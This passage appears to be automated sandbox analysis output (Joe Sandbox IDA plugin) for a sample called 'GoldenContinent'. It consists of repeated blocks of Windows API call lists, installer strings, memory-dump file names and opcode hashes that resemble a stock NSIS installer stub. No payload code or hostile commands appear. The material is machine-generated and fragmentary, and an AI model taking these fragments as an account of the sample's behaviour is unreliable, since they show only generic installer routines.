                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                            • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                            • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                            • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                            • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                            • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                            • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                            • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429E6D,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429E6D,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                              • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                              • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                                                                                                            • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                                                                                                            • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                                                                                                            • API String ID: 2014279497-3433828417
                                                                                                                                                                                                                                                                            • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                            • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                            • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                            • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                            • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00048A00,00000064,00111F1B), ref: 00403295
                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                            • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                            • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                            • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                            • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                            • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                            • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                            • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                            • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664483234.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664628894.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_GoldenContinent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                            • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                            • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1664460362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664390190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1664472207.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
